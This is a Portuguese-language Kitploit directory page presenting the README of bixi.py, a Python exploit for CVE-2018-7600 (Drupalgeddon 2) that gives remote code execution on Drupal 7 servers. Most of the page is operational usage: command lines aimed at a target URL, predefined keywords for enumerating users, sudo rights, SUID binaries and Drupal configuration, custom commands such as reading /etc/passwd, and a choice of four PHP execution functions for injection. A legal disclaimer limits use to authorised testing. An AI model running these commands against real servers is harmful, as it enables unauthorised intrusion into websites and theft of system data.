Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Drupalgeddon2-CVE-2018-7600 — Exploit em Python para CVE-2018-7600 (Drupalgeddon 2) que permite execução remota de código no Drupal 7 com múltiplos métodos de injeção e comandos predefinidos para Linux e Windows. | Kitploit
Ferramentas/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Exploit em Python para CVE-2018-7600 (Drupalgeddon 2) que permite execução remota de código no Drupal 7 com múltiplos métodos de injeção e comandos predefinidos para Linux e Windows.

Ver Repositório
5há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 Descrição

bixi.py é um exploit para a vulnerabilidade CVE‑2018‑7600 (Drupalgeddon 2) que afeta Drupal 7. Permite a execução remota de comandos (RCE) em servidores Drupal vulneráveis através de uma interface intuitiva e comandos predefinidos.


⚠️ DISCLAIMER / AVISO LEGAL

ESTE SOFTWARE É APENAS PARA FINS EDUCATIVOS E DE PESQUISA EM AMBIENTES CONTROLADOS.

  • Utilize apenas em sistemas que você possua ou tenha permissão por escrito para testar
  • O uso não autorizado é ILEGAL e pode resultar em consequências penais
  • O autor não se responsabiliza pelo mau uso desta ferramenta
  • Cumpra sempre as leis locais e internacionais de cibersegurança

"Com grandes poderes vêm grandes responsabilidades"


📋 Características

  • ✅ Exploração automática de CVE‑2018‑7600
  • ✅ Comandos predefinidos para Linux e Windows
  • ✅ Múltiplos métodos de injeção (system, passthru, exec, shell_exec)
  • ✅ Interface intuitiva com sistema de ajuda
  • ✅ Tratamento robusto de erros e timeouts
  • ✅ Saída formatada e fácil de ler

🚀 Instalação Rápida

1. Clonar repositório

git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600

2. Instalar dependências

# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests

# Outras distribuições
pip3 install requests

3. Dar permissões de execução

chmod +x bixi.py

🎯 Uso Básico

Ver ajuda completa

python3 bixi.py --help

Sintaxe geral

python3 bixi.py <URL> <COMANDO/PALAVRA_CHAVE> [TIPO_INJEÇÃO]

Exemplos práticos

# Verificar vulnerabilidade
python3 bixi.py http://10.99.99.6/drupal/ test

# Detectar sistema operacional
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows

# Enumerar usuários
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user

# Informação do sistema
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig

# Comandos personalizados
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"

📊 Palavras Chave Predefinidas

🐧 Linux

ComandoDescrição
linuxInformação do sistema
users_linuxListar usuários
idInfo de usuário/grupos
lsListar arquivos
ifconfigInfo de rede
find_flagBuscar flags

🪟 Windows

ComandoDescrição
windowsInformação do sistema
net_userListar usuários
whoami_winInfo detalhada
ipconfigRede
netstat_winConexões
dirListar diretório

🔧 Pentesting

ComandoDescrição
sudoVerificar privilégios sudo
suidBuscar binários SUID
net_localgroupGrupos locais
drupal_configBuscar configurações
drupal_versionObter versão do Drupal

🎨 Métodos de Injeção

# system (default)
python3 bixi.py http://target/ "whoami" system

# passthru
python3 bixi.py http://target/ "whoami" passthru

# exec
python3 bixi.py http://target/ "whoami" exec

# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec

🏗️ Estrutura do Projeto

drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│   ├── linux_commands.txt
│   └── windows_commands.txt
└── screenshots/
    ├── help_screen.png
    └── exploit_success.png

🔧 Configuração Avançada

Proxy (opcional)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

Timeout

Modificar valor por defecto (15 segundos):

timeout=15

Adicionar novos comandos

Editar o dicionário commands em get_command_for_keyword()


🐛 Solução de Problemas

Erro: No module named 'requests'

pip3 install requests

Erro: Connection refused

# Verificar conectividade
ping TARGET_IP

# Verificar rota Drupal
curl http://TARGET_IP/drupal/
Baixar ferramenta